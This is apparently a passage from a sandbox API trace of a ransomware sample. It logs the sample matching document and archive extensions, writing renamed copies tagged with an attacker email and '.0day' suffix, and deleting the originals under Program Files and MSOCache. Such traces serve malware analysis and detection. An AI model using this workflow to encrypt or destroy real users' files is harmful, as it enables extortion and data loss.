5 [0057.831] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.831] lstrlenW (lpString=".pdf") returned 4 [0057.831] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.831] lstrlenW (lpString=".xls") returned 4 [0057.831] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.831] lstrlenW (lpString=".xlsx") returned 5 [0057.831] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.831] lstrlenW (lpString=".ppt") returned 4 [0057.831] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0057.831] lstrlenW (lpString=".zip") returned 4 [0057.831] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.831] lstrlenW (lpString=".rar") returned 4 [0057.831] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.831] lstrlenW (lpString=".bz2") returned 4 [0057.831] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.831] lstrlenW (lpString=".7z") returned 3 [0057.831] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0057.831] lstrlenW (lpString=".dbf") returned 4 [0057.831] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0057.831] lstrlenW (lpString=".1cd") returned 4 [0057.831] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0057.831] lstrlenW (lpString=".jpg") returned 4 [0057.831] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.882] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.882] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0057.882] GetLastError () returned 0x0 [0057.882] ReadFile (in: hFile=0x178, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x30e8, lpOverlapped=0x0) returned 1 [0057.896] WriteFile (in: hFile=0x1a8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x30f0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x30f0, lpOverlapped=0x0) returned 1 [0057.897] ReadFile (in: hFile=0x178, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.897] WriteFile (in: hFile=0x1a8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.897] SetEndOfFile (hFile=0x1a8) returned 1 [0057.897] CloseHandle (hObject=0x1a8) returned 1 [0057.897] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.897] SetEndOfFile (hFile=0x178) returned 1 [0057.898] CloseHandle (hObject=0x178) returned 1 [0057.898] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.898] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf")) returned 1 [0057.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0057.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0057.899] lstrlenW (lpString=".doc") returned 4 [0057.899] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.899] lstrlenW (lpString=".docx") returned 5 [0057.899] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.899] lstrlenW (lpString=".pdf") returned 4 [0057.899] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.899] lstrlenW (lpString=".xls") returned 4 [0057.899] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.899] lstrlenW (lpString=".xlsx") returned 5 [0057.899] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.899] lstrlenW (lpString=".ppt") returned 4 [0057.899] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0057.899] lstrlenW (lpString=".zip") returned 4 [0057.899] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.899] lstrlenW (lpString=".rar") returned 4 [0057.899] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.899] lstrlenW (lpString=".bz2") returned 4 [0057.899] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.899] lstrlenW (lpString=".7z") returned 3 [0057.899] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0057.899] lstrlenW (lpString=".dbf") returned 4 [0057.899] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0057.899] lstrlenW (lpString=".1cd") returned 4 [0057.899] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0057.900] lstrlenW (lpString=".jpg") returned 4 [0057.900] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.900] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.900] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0057.900] GetLastError () returned 0x0 [0057.900] ReadFile (hFile=0x178, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0) Thread: id = 12 os_tid = 0xab4 [0032.548] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x6d00d0 [0032.549] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x3710048 [0032.549] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640308 [0032.549] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x6430a8 [0032.549] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640320 [0032.549] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x100000) returned 0x3810020 [0032.550] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640338 [0032.550] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640338, Size=0x20) returned 0x625d70 [0032.550] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640338 [0032.550] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640338, Size=0x20) returned 0x625c08 [0032.550] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.550] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.550] Wow64DisableWow64FsRedirection (in: OldValue=0x2d9ff58 | out: OldValue=0x2d9ff58*=0x0) returned 1 [0032.550] lstrlenW (lpString="kernel32.dll") returned 12 [0032.550] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625d70 | out: hHeap=0x5f0000) returned 1 [0032.550] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.550] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625c08 | out: hHeap=0x5f0000) returned 1 [0032.550] Sleep (dwMilliseconds=0x64) [0032.737] Sleep (dwMilliseconds=0x64) [0033.045] Sleep (dwMilliseconds=0x64) [0033.858] Sleep (dwMilliseconds=0x64) [0034.186] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.186] lstrlenW (lpString="Setup.xml") returned 9 [0034.186] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.186] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=5884) returned 1 [0034.186] CloseHandle (hObject=0x188) returned 1 [0034.186] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.186] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.186] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.186] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.186] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.186] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0034.186] GetLastError () returned 0x0 [0034.187] ReadFile (in: hFile=0x188, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x16fc, lpOverlapped=0x0) returned 1 [0034.199] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x1700, lpOverlapped=0x0) returned 1 [0034.200] ReadFile (in: hFile=0x188, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.200] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.200] SetEndOfFile (hFile=0x198) returned 1 [0034.201] CloseHandle (hObject=0x198) returned 1 [0034.201] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.201] SetEndOfFile (hFile=0x188) returned 1 [0034.202] CloseHandle (hObject=0x188) returned 1 [0034.202] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.202] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.203] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.203] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.203] lstrlenW (lpString=".doc") returned 4 [0034.203] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.203] lstrlenW (lpString=".docx") returned 5 [0034.203] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.203] lstrlenW (lpString=".pdf") returned 4 [0034.203] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.203] lstrlenW (lpString=".xls") returned 4 [0034.203] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.203] lstrlenW (lpString=".xlsx") returned 5 [0034.203] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.203] lstrlenW (lpString=".ppt") returned 4 [0034.203] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.203] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.203] lstrlenW (lpString=".zip") returned 4 [0034.203] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.203] lstrlenW (lpString=".rar") returned 4 [0034.203] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.203] lstrlenW (lpString=".bz2") returned 4 [0034.203] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.203] lstrlenW (lpString=".7z") returned 3 [0034.203] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.203] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.203] lstrlenW (lpString=".dbf") returned 4 [0034.203] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.203] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.203] lstrlenW (lpString=".1cd") returned 4 [0034.203] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.203] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.204] lstrlenW (lpString=".jpg") returned 4 [0034.204] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.204] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.204] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.204] lstrlenW (lpString=".doc") returned 4 [0034.204] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.204] lstrlenW (lpString=".docx") returned 5 [0034.204] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.204] lstrlenW (lpString=".pdf") returned 4 [0034.204] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.204] lstrlenW (lpString=".xls") returned 4 [0034.204] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.204] lstrlenW (lpString=".xlsx") returned 5 [0034.204] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.204] lstrlenW (lpString=".ppt") returned 4 [0034.204] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.204] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.204] lstrlenW (lpString=".zip") returned 4 [0034.204] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.204] lstrlenW (lpString=".rar") returned 4 [0034.204] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.204] lstrlenW (lpString=".bz2") returned 4 [0034.204] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.204] lstrlenW (lpString=".7z") returned 3 [0034.204] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.204] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.204] lstrlenW (lpString=".dbf") returned 4 [0034.204] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.204] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.204] lstrlenW (lpString=".1cd") returned 4 [0034.204] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.204] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.204] lstrlenW (lpString=".jpg") returned 4 [0034.205] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.205] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.205] lstrlenW (lpString="Office32MUI.xml") returned 15 [0034.205] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.205] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1383) returned 1 [0034.205] CloseHandle (hObject=0x188) returned 1 [0034.205] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 0x2020 [0034.205] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.205] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.205] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.206] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.206] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0034.206] GetLastError () returned 0x0 [0034.206] ReadFile (in: hFile=0x188, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x567, lpOverlapped=0x0) returned 1 [0034.207] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x570, lpOverlapped=0x0) returned 1 [0034.208] ReadFile (in: hFile=0x188, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.208] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0034.208] SetEndOfFile (hFile=0x198) returned 1 [0034.208] CloseHandle (hObject=0x198) returned 1 [0034.209] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.209] SetEndOfFile (hFile=0x188) returned 1 [0034.210] CloseHandle (hObject=0x188) returned 1 [0034.210] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.210] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 1 [0034.210] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.210] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.210] lstrlenW (lpString=".doc") returned 4 [0034.210] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.210] lstrlenW (lpString=".docx") returned 5 [0034.210] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.210] lstrlenW (lpString=".pdf") returned 4 [0034.210] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.210] lstrlenW (lpString=".xls") returned 4 [0034.211] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.211] lstrlenW (lpString=".xlsx") returned 5 [0034.211] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.211] lstrlenW (lpString=".ppt") returned 4 [0034.211] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.211] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.211] lstrlenW (lpString=".zip") returned 4 [0034.211] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.211] lstrlenW (lpString=".rar") returned 4 [0034.211] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.211] lstrlenW (lpString=".bz2") returned 4 [0034.211] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.211] lstrlenW (lpString=".7z") returned 3 [0034.211] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.211] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.211] lstrlenW (lpString=".dbf") returned 4 [0034.211] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.211] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.211] lstrlenW (lpString=".1cd") returned 4 [0034.211] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.211] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.211] lstrlenW (lpString=".jpg") returned 4 [0034.211] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.211] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.211] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.211] lstrlenW (lpString=".doc") returned 4 [0034.211] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.211] lstrlenW (lpString=".docx") returned 5 [0034.211] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.211] lstrlenW (lpString=".pdf") returned 4 [0034.211] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.211] lstrlenW (lpString=".xls") returned 4 [0034.212] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.212] lstrlenW (lpString=".xlsx") returned 5 [0034.212] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.212] lstrlenW (lpString=".ppt") returned 4 [0034.212] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.212] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.212] lstrlenW (lpString=".zip") returned 4 [0034.212] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.212] lstrlenW (lpString=".rar") returned 4 [0034.212] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.212] lstrlenW (lpString=".bz2") returned 4 [0034.212] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.212] lstrlenW (lpString=".7z") returned 3 [0034.212] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.212] lstrlenW 